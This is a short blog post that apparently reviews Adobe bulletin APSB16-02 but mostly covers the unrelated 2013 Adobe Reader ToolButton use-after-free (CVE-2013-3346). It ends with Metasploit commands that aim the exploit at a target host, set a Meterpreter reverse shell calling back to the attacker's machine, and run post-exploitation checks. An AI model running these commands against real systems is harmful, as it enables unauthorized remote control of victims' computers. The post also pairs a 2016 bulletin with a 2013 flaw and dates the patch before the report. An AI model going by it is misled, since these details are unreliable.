APSB16-02 – Adobe Acrobat and Reader Security Bulletin Review

Adobe has release, the January 12th 2016, during his January Patch Tuesday, one Adobe Acrobat and Reader security bulletin dealing with 17 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-02 is concerning:

  • Acrobat DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat XI 11.0.13 and earlier versions on Windows and Macintosh
  • Reader XI 11.0.13 and earlier versions on Windows and Macintosh

CVE-2013-3346 Adobe Reader ToolButton Use After Free

Timeline :

Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16

PoC provided by :

Soroush Dalili
Unknown
sinn3r
juan vazquez

Reference(s) :

CVE-2013-3346
OSVDB-96745
ZDI-13-212
APSB13-15

Affected version(s) :

Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.

Tested on :

with Adobe Reader 11.0.2 on Windows XP SP3

Description :

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton

Commands :

use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo